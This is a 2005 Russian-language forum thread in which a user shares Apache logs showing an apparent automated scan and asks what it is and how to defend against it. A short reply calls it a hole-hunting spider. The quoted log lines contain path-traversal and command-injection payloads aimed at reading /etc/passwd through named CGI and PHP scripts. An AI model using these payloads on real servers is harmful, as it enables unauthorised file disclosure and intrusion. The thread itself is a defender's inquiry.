Forum Webscript.Ru
Общие => Веб Сервера => Тема начата: Slastik от 21 Мая 2005, 18:38:18
-
Здравствуйте
у меня стоит apache 1.3.27
два дня в логах обнаружил интереснейшие запросы
цитирую часть из них, их было где то в 4 ре раза больше.
(айпи я удалил сознательно, комп мой находиться в локальной сети, стоит файервол OutPost, доступ в инет через прокси.)
*.*.*.* - - [18/May/2005:22:26:03 +0300] "GET /cgi-bin/DCShop/Orders/orders.txt HTTP/1.0" 404 292
*.*.*.* - - [18/May/2005:22:26:03 +0300] "GET /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.0" 404 279
*.*.*.* - - [18/May/2005:22:26:03 +0300] "GET /cgi-bin/get32.exe HTTP/1.0" 404 277
*.*.*.* - - [18/May/2005:22:26:03 +0300] "GET /cgi-bin/auktion.cgi?menue=../../../../../../../../../etc/passwd HTTP/1.0" 404 279
*.*.*.* - - [18/May/2005:22:26:03 +0300] "HEAD /// HTTP/1.0" 200 0
*.*.*.* - - [18/May/2005:22:26:03 +0300] "GET ///index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 271
*.*.*.* - - [18/May/2005:22:26:03 +0300] "GET /cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc HTTP/1.0" 404 277
*.*.*.* - - [18/May/2005:22:26:03 +0300] "GET //edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 HTTP/1.0" 404 275
*.*.*.* - - [18/May/2005:22:26:04 +0300] "GET /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd| HTTP/1.0" 404 276
*.*.*.* - - [18/May/2005:22:26:04 +0300] "GET /cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 275
*.*.*.* - - [18/May/2005:22:26:04 +0300] "GET /cgi-bin/story.pl?next=../../../etc/passwd%00 HTTP/1.0" 404 276
*.*.*.* - - [18/May/2005:22:26:04 +0300] "GET //ftp.pl?dir=../../../../../../ HTTP/1.0" 404 267
*.*.*.* - - [18/May/2005:22:26:04 +0300] "GET /cgi-bin/publisher/search.cgi?dir=jobs&template=;cat+/etc/passwd|&output_number=10 HTTP/1.0" 404 288
*.*.*.* - - [18/May/2005:22:26:04 +0300] "HEAD /cowsconf/ HTTP/1.0" 404 0
*.*.*.* - - [18/May/2005:22:26:04 +0300] "HEAD /cgi-bin/cowsconf/ HTTP/1.0" 404 0
*.*.*.* - - [18/May/2005:22:26:04 +0300] "GET //modules.php?name=Members_List&&sql_debug=1 HTTP/1.0" 404 272
*.*.*.* - - [18/May/2005:22:26:04 +0300] "GET /cgi-bin/faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0" 404 282
*.*.*.* - - [18/May/2005:22:26:04 +0300] "HEAD /cg-bin/ HTTP/1.0" 404 0
*.*.*.* - - [18/May/2005:22:26:04 +0300] "GET /cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 279
*.*.*.* - - [18/May/2005:22:26:04 +0300] "GET /cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd HTTP/1.0" 404 276
*.*.*.* - - [18/May/2005:22:26:04 +0300] "GET ///directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0" 404 275
*.*.*.* - - [18/May/2005:22:26:04 +0300] "GET /cgi-bin/directory.php?dir=%3Bmore%20/etc/passwd HTTP/1.0" 404 281
*.*.*.* - - [18/May/2005:22:26:04 +0300] "GET /cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini HTTP/1.0" 404 276
*.*.*.* - - [18/May/2005:22:26:04 +0300] "HEAD /examples/ HTTP/1.0" 404 0
*.*.*.* - - [18/May/2005:22:26:04 +0300] "HEAD /perl/ HTTP/1.0" 404 0
Насколько я понял это какое то злое хакерство.
Скажите пожалуйста что это, чем это мне грозит, как такие вещи делают, и как от этого защитится,
и можно ли подделать айпи в логах.
Спасибо
-
что это
паучек ищет дырки...
чем это мне грозит
если он их найдет, тогда в зависимости от того какая это дырка будет трабла.
как такие вещи делают
молча... :)
и как от этого защитится
не белать дырок. можно забанить ip файерволом... но главное не делать дырок.
можно ли подделать айпи в логах
ну если так хочеться конечно подделай... :)
-
Спасибо за ответ
то есть это не совсем прямая атака, а только поиск дыр в апаче?
Я в яндексе забил подобные запросы как у меня в логах, так там такие интересные вещи понаходил, вплоть до взлома каких то платежны систем.
интересно как мог мой апач такому поспособствовать.
или меня собирались использовать как часть цепи?
Вообще как то можно определить удачная ли у них была атака? (продолжалась где то до 2 ух мин)
не белать дырок. можно забанить ip файерволом... но главное не делать дырок
можно пожалуйста с этого места поподробнее или где можно про это почитать ?
то есть от уязвимости можно избавиться с помощью грамотных настроек?
ну если так хочеться конечно подделай
я имел ввиду действительно ли меня атаковали с компа айпи который был указан, или он тоже мог быть не в чем неведающей жертвой?